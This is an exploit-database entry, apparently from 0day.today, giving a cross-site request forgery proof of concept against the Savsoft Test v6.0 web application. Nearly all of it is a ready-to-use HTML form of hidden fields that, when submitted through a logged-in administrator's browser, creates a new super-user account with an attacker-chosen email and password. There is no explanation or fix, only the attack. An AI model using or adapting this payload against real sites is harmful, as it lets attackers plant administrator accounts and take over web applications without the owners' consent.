id: 18468
date: 06/07/2012
title: Savsoft Test v6.0  CSRF Vulnerability (Add Admin)
author: AtT4CKxT3rR0r1ST
cves: 

Savsoft Test v6.0  CSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://savsofteproducts.com/
.:. Tested On Demo : http://test.savsofteproducts.com/demo/
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://SITE/index.php/member/add">
<input type="hidden" name="first_name" value="Mohamad"/>
<input type="hidden" name="last_name" value="Hussien"/>
<input type="hidden" name="email" value="F.Hack@w.cn"/>
<input type="hidden" name="password" value="12121212"/>
<input type="hidden" name="contact_no" value="....."/>
<input type="hidden" name="address" value="....."/>
<input type="hidden" name="country" value="....."/>
<input type="hidden" name="credit" value="....."/>
<input type="hidden" name="gid" value="1"/>
<input type="hidden" name="status" value="1"/>
<input type="hidden" name="su" value="1"/>
</form>

</body>
</html>

#################################################################### 



#  0day.today [2023-03-24]  #